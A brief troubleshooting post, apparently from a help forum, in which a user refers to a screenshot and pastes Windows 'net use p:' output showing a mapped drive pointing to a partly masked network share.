See attached screenshot showing the error as well as what happened after solution.




C:\Users\mfaiz\Downloads>net use p:
Local name        p:
Remote name       \\sxa.xxx.xxx.com\ap-xxx
Resource type     Disk
The command completed successfully.